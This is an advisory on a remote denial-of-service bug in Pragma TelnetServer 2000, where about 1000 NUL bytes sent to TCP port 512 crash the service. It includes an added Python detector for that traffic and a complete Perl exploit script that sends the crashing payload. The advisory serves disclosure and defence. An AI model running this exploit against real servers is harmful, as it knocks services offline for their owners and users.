COMMAND

    telnetd

SYSTEMS AFFECTED

    Pragma TelnetServer 2000 for Windows NT/2000

PROBLEM

    The Ussr Labs team has recently discovered a buffer overflow (memory
    corruption) problem in the rpc module of the Pragma TelnetServer 2000.
    Sending a malformed request to TCP port 512 causes the process that
    hosts the services to crash, i.e. a remote denial of service. Only the
    crash has been demonstrated; the request consists of nothing but NULL
    bytes, so no controlled code execution is shown here.

    Demonstration:

        [hellme@die-communitech.net$ telnet example.com 512
        Trying example.com...
        Connected to example.com.
        Escape character is '^]'.
        [buffer]

    where [buffer] is approx. 1000 NULL characters. On receiving it, the
    process containing the service crashes.
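
    The request shape above is easy to recognise on the wire: a long run of
    NULL bytes delivered to TCP port 512. The following detector is an added
    example written for this page, not code from Ussr Labs or Pragma. It
    inspects one TCP payload at a time and flags the advisory's pattern. TCP
    port 512 normally carries the rexec service, whose legitimate requests
    contain only a handful of NULL separators, so the detector keys on the
    longest run of NULL bytes rather than on their mere presence. The
    threshold of 256 bytes and the sample flows are assumptions constructed
    for the example.

```python
"""Detector for the NUL-flood request described in the advisory above.

Added example, not part of the original Ussr Labs advisory.  The threshold
and the sample payloads below are assumptions made for this example.
"""

DEFAULT_PORT = 512     # port named in the advisory
NUL_THRESHOLD = 256    # assumed: far above the few NULs a real rexec request carries


def longest_nul_run(payload: bytes) -> int:
    """Return the length of the longest run of consecutive 0x00 bytes."""
    best = cur = 0
    for b in payload:
        if b == 0:
            cur += 1
            if cur > best:
                best = cur
        else:
            cur = 0
    return best


def is_nul_flood(dst_port: int, payload: bytes,
                 port: int = DEFAULT_PORT,
                 threshold: int = NUL_THRESHOLD) -> bool:
    """True when a payload to `port` holds a NUL run of at least `threshold` bytes."""
    if dst_port != port:
        return False
    return longest_nul_run(payload) >= threshold


def classify(flows):
    """Run the detector over (dst_port, payload) tuples; return indices that match."""
    return [i for i, (p, data) in enumerate(flows) if is_nul_flood(p, data)]


# Constructed sample traffic (not captured data):
SAMPLE_FLOWS = [
    # 0: the advisory's payload, 1000 NULs to 512/tcp
    (512, b"\0" * 1000),
    # 1: an ordinary rexec request: port, user, password, command, NUL-separated
    (512, b"0\0user\0secret\0dir\0"),
    # 2: the same NUL flood aimed at the telnet port, outside this signature
    (23, b"\0" * 1000),
    # 3: NULs interleaved with other bytes, so no long run
    (512, b"\0A" * 500),
]

if __name__ == "__main__":
    for i in classify(SAMPLE_FLOWS):
        port, data = SAMPLE_FLOWS[i]
        print(f"flow {i}: NUL flood to tcp/{port}, {len(data)} bytes, "
              f"longest run {longest_nul_run(data)}")
```

    Only flow 0 matches. Tune NUL_THRESHOLD to the size of the requests your
    own rexec clients send; the advisory's 1000-byte payload sits far above
    any sane legitimate value.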

    Exploit in Perl:

    #!/usr/bin/perl
    #########################################################
    # Exploit by USSRLabs www.ussrback.com
    # Sending ~1000 NUL bytes to port 512 causes the server to crash.
    #########################################################
    #
    # $0 -s <server> [ -p <port> ]
    #
    # Null request DoS
    #
    use strict;
    use warnings;
    use Getopt::Std;
    use Socket;

    my %args;
    getopts('s:p:', \%args);                # both -s and -p take a value
    usage() unless defined $args{s};

    my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
    $serv   = $args{s};                     # remote server
    $port   = $args{p} || 512;              # remote port, default is 512
    $foo    = "\0";                         # this is the Null
    $number = 1000;                         # total number of Nulls to send
    $data   = $foo x $number;               # $number copies of $foo
    $buf    = $data;                        # payload sent to the server

    $in_addr = (gethostbyname($serv))[4] || die("Error: cannot resolve $serv\n");
    $paddr   = sockaddr_in($port, $in_addr) || die("Error: $!\n");
    $proto   = getprotobyname('tcp')        || die("Error: $!\n");

    socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(S, $paddr)                      || die("Error: $!\n");
    select(S); $| = 1; select(STDOUT);      # autoflush the socket
    print S $buf;
    close(S);

    print("Data has been successfully sent to $serv\n");

    sub usage { die("\n\n$0 -s <server> [ -p <port> ]\n\n"); }

SOLUTION

    A fix is planned for Build 2 of TelnetServer 2000, to be released soon.